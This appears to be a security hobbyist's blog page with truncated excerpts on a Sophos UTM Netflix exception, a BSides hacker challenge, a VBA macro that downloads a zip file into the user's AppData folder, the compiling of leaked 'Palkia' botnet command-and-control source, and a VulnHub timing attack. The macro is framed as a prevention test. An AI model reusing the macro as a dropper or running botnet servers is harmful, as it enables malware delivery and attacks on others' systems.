*** This solution no longer works with updates that Sophos has applied or changes that Netflix has made!
I was helping a friend with a Sophos UTM and found that netflix would not stream on their mobile devices. We went into the settings and through studying the weblog and how netflix URL's are put togehter and created the following regex to add an exception so the AV would not scan the URL:
Below is a screenshot of the exception that was created:
Now as long as the bot masters do not create a bot that uses that regex to exfil data it will work great!! Oh by-the-way the Sophos UTM is free for home use. It is a nice Unified Threat Management (UTM) for home use and is a lot better than a router you can buy out of the store.
At BSides 2016 I participated in their Hackers Challenge. The challenges were based on reverse engineering, network packet analysis, and many other puzzles that you needed to figure out. When I had hit the wall at 3AM in the morning on March 11th I was in 2nd place. By the end of the competition which was at 10AM I had dropped to 7th. The challenge was great! Thanks BSides...
Check-out the django.nV project. This is a project that was used in the Hackers Challenge but was adapted from its original state.
Screenshot of being in 2nd place at 3AM.
Screenshot of being in 7th place at the end of the competition.
One thing to note is most of the challenges were worth 4,000 points in the beginning. If you did the challenge and no-one else you kept the 4,000 points. For each participant that accomplished the challenge you had to divide the points with them.
Below is a Visual Basic for Applications script I quickly build to download a file through a Macro to the computer. This was to test the capability of being able to do it and finding a way to prevent it from occurring.
' vTest Macro
Dim myURL As String
dURL = "http://blah/text.zip"
Dim WinHttpReq As Object
Dim fileName As String
fileName = Environ("AppData") & "\microsoft\text.zip"
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
WinHttpReq.Open "GET", dURL
If WinHttpReq.Status = 200 Then
Set oStream = CreateObject("ADODB.Stream")
oStream.Type = 1
oStream.SaveToFile fileName, 2
Through the information gathered inside of the binaries I began searching for unique strings on Google. One of the unique strings that I searched for was "HTTPFLOOD GHP". This pulled back less than 10 results and the first one was from the site hxxp://psbdmp.com/wT1htV9b. This contained the source code for what they called "Palkia Server.c".
This particular piece of source code was found to have been leaked on 2016-11-12 09:58:05 according to the timestamp on the paste. I have not validated that the binary in which I found the string matches up with this particular CnC Server source code.
After looking at the source code and understanding the logic, verifying there were no backdoors and other intents to infect my systems I compiled the source code on a temporary server. Upon execution you need to specify which port it listens on for the bot connections and the number of threads it will utilize.
After you specify the port and the number of threads it begins to …
I was looking through the boot 2 root vulnerable images that they have on vulnhub.com and Pandora's box caught my eye. I wanted to follow and experiment with this timing attack described in the walkthrough done by strata. I am using code that resembles that used by strata.
To briefly describe what is occurring to gather the first password. You can connect on port 54311 and you are prompted for a password. strata determined through some testing that if you guessed the correct letter in the password it would return quicker than if you did not. I wanted to be able to see this so I created the following script: